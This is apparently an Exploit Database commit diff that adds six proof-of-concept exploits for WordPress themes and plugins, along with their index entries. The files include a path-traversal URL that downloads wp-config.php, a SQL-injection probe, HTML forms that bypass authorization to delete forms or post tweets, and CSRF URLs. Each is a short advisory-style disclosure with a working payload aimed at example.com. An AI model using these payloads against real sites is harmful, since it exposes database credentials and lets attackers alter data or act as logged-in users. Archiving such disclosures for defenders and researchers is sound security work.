DB: 2016-01-25
6 new exploits
This commit is contained in:
parent
73e749c845
commit
5f07a690c4
7 changed files with 73 additions and 0 deletions
|
@ -35539,3 +35539,9 @@ id,file,description,date,author,platform,type,port
|
|||
39296,platforms/php/webapps/39296.txt,"WordPress Urban City Theme 'download.php' Arbitrary File Download Vulnerabilitiy",2014-09-08,"Ashiyane Digital Security Team",php,webapps,0
|
||||
39297,platforms/php/webapps/39297.txt,"WordPress Authentic Theme 'download.php' Arbitrary File Download Vulnerabilitiy",2014-09-08,"Ashiyane Digital Security Team",php,webapps,0
|
||||
39298,platforms/php/webapps/39298.txt,"WordPress Epic Theme 'download.php' Arbitrary File Download Vulnerabilitiy",2014-09-08,"Ashiyane Digital Security Team",php,webapps,0
|
||||
39299,platforms/php/webapps/39299.txt,"WordPress Antioch Theme 'download.php' Arbitrary File Download Vulnerabilitiy",2014-09-08,"Ashiyane Digital Security Team",php,webapps,0
|
||||
39300,platforms/php/webapps/39300.txt,"WordPress Spider Facebook Plugin 'facebook.php' SQL Injection Vulnerability",2014-09-07,"Claudio Viviani",php,webapps,0
|
||||
39301,platforms/php/webapps/39301.html,"WordPress Ninja Forms Plugin Authorization Bypass Vulnerability",2014-09-08,Voxel@Night,php,webapps,0
|
||||
39302,platforms/php/webapps/39302.html,"WordPress WP to Twitter Plugin Authorization Bypass Vulnerability",2014-09-08,Voxel@Night,php,webapps,0
|
||||
39303,platforms/php/webapps/39303.txt,"WordPress Xhanch My Twitter Plugin Cross Site Request Forgery Vulnerability",2014-09-08,Voxel@Night,php,webapps,0
|
||||
39304,platforms/php/webapps/39304.txt,"WordPress W3 Total Cache Plugin 'admin.php' Cross Site Request Forgery Vulnerability",2014-09-08,Voxel@Night,php,webapps,0
|
||||
|
|
Can't render this file because it is too large.
|
7
platforms/php/webapps/39299.txt
Executable file
7
platforms/php/webapps/39299.txt
Executable file
|
@ -0,0 +1,7 @@
|
|||
source: http://www.securityfocus.com/bid/69673/info
|
||||
|
||||
Antioch theme for Wordpress is prone to an arbitrary file-download vulnerability.
|
||||
|
||||
An attacker can exploit this issue to download arbitrary files from the web server and obtain potentially sensitive information.
|
||||
|
||||
http://www.example.com/wp-content/themes/antioch/lib/scripts/download.php?file=../../../../../wp-config.php
|
9
platforms/php/webapps/39300.txt
Executable file
9
platforms/php/webapps/39300.txt
Executable file
|
@ -0,0 +1,9 @@
|
|||
source: http://www.securityfocus.com/bid/69675/info
|
||||
|
||||
Spider Facebook plugin for WordPress is prone to an SQL-injection vulnerability because it fails to sufficiently sanitize user-supplied data before using it in an SQL query.
|
||||
|
||||
Exploiting this issue could allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.
|
||||
|
||||
Spider Facebook 1.0.8 is vulnerable; other versions may also be affected.
|
||||
|
||||
http://www.example.com/wordpress/wp-admin/admin.php?page=Spider_Facebook_manage&task=Spider_Facebook_edit&id=1 and 1=2
|
15
platforms/php/webapps/39301.html
Executable file
15
platforms/php/webapps/39301.html
Executable file
|
@ -0,0 +1,15 @@
|
|||
source: http://www.securityfocus.com/bid/69740/info
|
||||
|
||||
The Ninja Forms Plugin for WordPress is prone to an authorization-bypass vulnerability.
|
||||
|
||||
An attacker can exploit this issue to bypass certain security restrictions and perform unauthorized actions; this may aid in launching further attacks.
|
||||
|
||||
Ninja Forms Plugin 2.7.7 is vulnerable; other versions may also be affected.
|
||||
|
||||
<html><body>
|
||||
<form action="http://www.example.com/wordpress/wp-admin/admin-ajax.php" method="POST">
|
||||
form id: <input name="form_id" value="1"><br>
|
||||
action: <input name="action" value="ninja_forms_delete_form">
|
||||
<input type="submit" value="submit">
|
||||
</form>
|
||||
</body></html>
|
18
platforms/php/webapps/39302.html
Executable file
18
platforms/php/webapps/39302.html
Executable file
|
@ -0,0 +1,18 @@
|
|||
source: http://www.securityfocus.com/bid/69741/info
|
||||
|
||||
WP to Twitter Plugin for WordPress is prone to an authorization-bypass vulnerability.
|
||||
|
||||
An attacker can exploit this issue to bypass certain security restrictions and perform unauthorized actions; this may aid in launching further attacks.
|
||||
|
||||
WP to Twitter 2.9.3 is vulnerable; other versions may also be affected.
|
||||
|
||||
<html><body>
|
||||
<form method="post" action="http://www.example.com/wordpress/wp-admin/admin-ajax.php">
|
||||
action:<input name="action" value="wpt_tweet"><br>
|
||||
tweet action:<input name="tweet_action" value="tweet"><br>
|
||||
tweet text: <input value="" name="tweet_text"><br>
|
||||
tweet schedule: <input value="undefined+undefined" name="tweet_schedule"><br>
|
||||
tweet post id: <input value="1" name="tweet_post_id"><br>
|
||||
<input type="submit" value="Submit">
|
||||
</form>
|
||||
</body></html>
|
9
platforms/php/webapps/39303.txt
Executable file
9
platforms/php/webapps/39303.txt
Executable file
|
@ -0,0 +1,9 @@
|
|||
source: http://www.securityfocus.com/bid/69744/info
|
||||
|
||||
Xhanch My Twitter plugin for WordPress is prone to a cross-site request-forgery vulnerability.
|
||||
|
||||
An attacker can exploit the cross-site request forgery issue to perform unauthorized actions in the context of a logged-in user of the affected application. This may aid in other attacks.
|
||||
|
||||
Xhanch My Twitter 2.7.7 is vulnerable; other versions may also be affected.
|
||||
|
||||
http://www.example.com/wordpress/?xmt_Primary_twt_id=508351521810300928
|
9
platforms/php/webapps/39304.txt
Executable file
9
platforms/php/webapps/39304.txt
Executable file
|
@ -0,0 +1,9 @@
|
|||
source: http://www.securityfocus.com/bid/69745/info
|
||||
|
||||
W3 Total Cache plugin for WordPress is prone to a cross-site request-forgery vulnerability.
|
||||
|
||||
An attacker can exploit the cross-site request forgery issue to perform unauthorized actions in the context of a logged-in user of the affected application. This may aid in other attacks.
|
||||
|
||||
W3 Total Cache 0.9.4 is vulnerable; other versions may also be affected.
|
||||
|
||||
http://www.example.com/wordpress/wp-admin/admin.php?page=w3tc_general&w3tc_note=enabled_edge
|
Loading…
Add table
Reference in a new issue